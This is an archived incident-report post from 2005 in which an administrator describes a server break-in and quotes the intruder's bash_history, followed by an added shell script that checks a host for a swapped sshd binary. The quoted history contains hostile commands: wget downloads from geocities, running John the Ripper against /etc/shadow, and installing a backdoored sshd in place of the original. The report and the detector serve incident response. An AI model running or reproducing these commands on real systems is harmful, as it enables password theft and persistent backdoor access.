Network Security Incidents

SSH compiled with backdoor

Subject: SSH compiled with backdoor
Date: 27 Aug 2005 13:02:08 -0000
Hi!

One of my web servers was hacked on July 17, 2005.  bash_history showed:

w
wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd ../run;./john /etc/shadow
wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm -rf sshd.tar.gz;cd sshd;cd apps/ssh
pico genx.h
pico genx.h
pico ssh2includes.h
cd ../..
./configure --without-x
make
make install
mkdir /lib/java
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd
cp /usr/local/sbin/sshd /usr/sbin
/etc/rc.d/init.d/sshd restart
/etc/rc.d/init.d/ssh restart
locate init.d
/etc/init.d/sshd restart
w
reboot

According to john, a couple of users had weak passwords, but root seemed well 
protected.  From looking in all the bash_history, it appears the hacker came in 
from the website account, and did an su from there.

I found this about a month later when I logged into the box, did an ls, only to 
be met by a seg fault.  A ps x showed mech.tgz trying to be downloaded, and a 
bunch of other CRON processes running.  The auth log didn't show other logins, 
though, so the ssh installed must have logging turned off for the backdoor they 
installed.

I filled out an abuse form at geocities for the accounts hosting the software 
after downloading the software (I couldn't find the tgz files on my system).

Last showed:
reboot   system boot  2.4.18-bf2.4     Sun Jul 17 18:15         (37+11:47)  
website  pts/0        193.231.77.74    Sun Jul 17 17:42 - down   (00:27)    
website  pts/1        193.231.77.74    Sun Jul 17 17:05 - 17:26  (00:20)    
website  pts/0        211.43.207.169   Sun Jul 17 16:26 - 17:41  (01:14)    

whois says:
inetnum:      193.231.77.0 - 193.231.77.255
netname:      DATANET-RO
descr:        Starnets - Datanet
country:      RO
address:      DATA NET
address:      Str. Ioan N. Roman Nr. 13
address:      Constanta, cod 900199, ROMANIA

Best Regards,

Steve
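The following is an added example for this archive page, not part of Steve's message and not code from any of the people involved. The bash_history above records the textbook binary swap: the vendor sshd copied aside into /lib/java, a fresh build installed under /usr/local/sbin and then copied over /usr/sbin/sshd, followed by a service restart. The script below is one way to check a host for exactly that pattern. Everything it assumes is made up here: the baseline file format ("<sha256>  <path>"), /usr/sbin/sshd as the only legitimate install path, and the sample "filesystem" it builds in a temp directory, where short text files stand in for sshd binaries.

```shell
#!/bin/sh
# Added example: detect a swapped sshd of the kind described in the post.
# Two independent checks:
#   1. every file named "sshd" under ROOT is hashed and compared against a
#      baseline of known-good digests (constructed here; on a real host take
#      it from a pristine install medium or the package database);
#   2. any "sshd" outside the expected install path is flagged, because a
#      stashed original (/lib/java/sshd) or a /usr/local build is itself
#      evidence, regardless of what /usr/sbin/sshd hashes to.

# Portable SHA-256 of one file (GNU coreutils or Perl shasum).
hash_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# audit_sshd ROOT BASELINE
# Prints one sorted line per finding, "<verdict> <path-relative-to-ROOT>":
#   TAMPERED  expected path, digest not in the baseline
#   STRAY     sshd outside the expected path (stashed original, local build)
#   OK        expected path, digest matches the baseline
# Assumption: /usr/sbin/sshd is the only legitimate location on this host.
audit_sshd() {
    root=$1; baseline=$2
    find "$root" -type f -name sshd | while IFS= read -r f; do
        rel=${f#"$root"}
        h=$(hash_of "$f")
        case "$rel" in
            /usr/sbin/sshd)
                if grep -q "^$h" "$baseline"; then
                    echo "OK $rel"
                else
                    echo "TAMPERED $rel"
                fi ;;
            *)
                echo "STRAY $rel" ;;
        esac
    done | sort
}

# On a live RPM or dpkg host the package database is the natural baseline:
# rpm -Vf reports a "5" in the verify column when the file digest differs,
# dpkg -V (dpkg >= 1.17) reports "??5??????" for a changed md5sum.
pkg_verify_sshd() {
    if command -v rpm >/dev/null 2>&1; then
        rpm -Vf /usr/sbin/sshd
    elif command -v dpkg >/dev/null 2>&1; then
        dpkg -V openssh-server
    else
        echo "no package database found; use audit_sshd with a trusted baseline" >&2
        return 2
    fi
}

# make_sample_root DIR
# Constructed image mirroring the post's bash_history: the vendor sshd moved
# to /lib/java, a different build installed to /usr/local/sbin/sshd and
# copied over /usr/sbin/sshd. The files are dummy text, not real binaries.
make_sample_root() {
    d=$1
    mkdir -p "$d/usr/sbin" "$d/usr/local/sbin" "$d/lib/java"
    printf 'vendor sshd build\n'     > "$d/lib/java/sshd"
    printf 'backdoored sshd build\n' > "$d/usr/local/sbin/sshd"
    cp "$d/usr/local/sbin/sshd" "$d/usr/sbin/sshd"
    # The baseline records what /usr/sbin/sshd *should* hash to: the vendor build.
    printf '%s  /usr/sbin/sshd\n' "$(hash_of "$d/lib/java/sshd")" > "$d/baseline.txt"
}

# Build the sample image, audit it, clean up; returns the findings on stdout.
demo_audit() {
    tmp=$(mktemp -d)
    make_sample_root "$tmp"
    audit_sshd "$tmp" "$tmp/baseline.txt"
    rm -rf "$tmp"
}

# Run "sh audit_sshd.sh --demo" to see the three findings for the sample image.
if [ "${1:-}" = "--demo" ]; then
    demo_audit
fi
```

On the sample image the audit reports TAMPERED for /usr/sbin/sshd and STRAY for both /lib/java/sshd and /usr/local/sbin/sshd. The stray copy is the useful one in an investigation: it is the original binary the attacker set aside, so diffing it against the installed sshd (strings, linked libraries, build date) tells you what was changed. Note that a kit which also replaced `find`, `ls` or `sha256sum` would defeat a check run with the host's own tools, which is why the post's segfaulting `ls` is a reason to boot from trusted media before trusting any of these results.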
